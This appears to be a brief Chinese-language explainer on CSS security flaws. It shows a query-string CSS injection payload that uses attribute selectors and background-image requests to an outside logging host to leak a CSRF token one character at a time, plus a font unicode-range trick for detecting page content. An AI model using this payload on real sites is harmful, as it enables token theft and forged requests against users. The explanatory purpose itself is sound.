CSS安全漏洞
伪元素
background-image属性
举例如下,
原理
- 1、向要攻击的站点的url附上一段查询字符串,如
injection=#sensitiveForm input[value^='${csrfToken}a'] {background-image:url(https://security.love/log.php/${csrfToken}a);} - 2、当页面存在满足以上CSS选择器时,便会触发
background-image地址链接,推断出token的第一个字符 - 3、重复步骤1、2,直到服务器再无接收到响应,可认为已获取到token的所有字符
- 1、向要攻击的站点的url附上一段查询字符串,如
相关链接
自定义字体
css
@font-face {
font-family: blah;
src: url('/page-contains-q') format('woff');
unicode-range: U+85;
}
html {
font-family: blah, sans-serif;
}这些漏洞存在安全隐患,当然也可以往好的方面利用,比如做网页追踪、分析
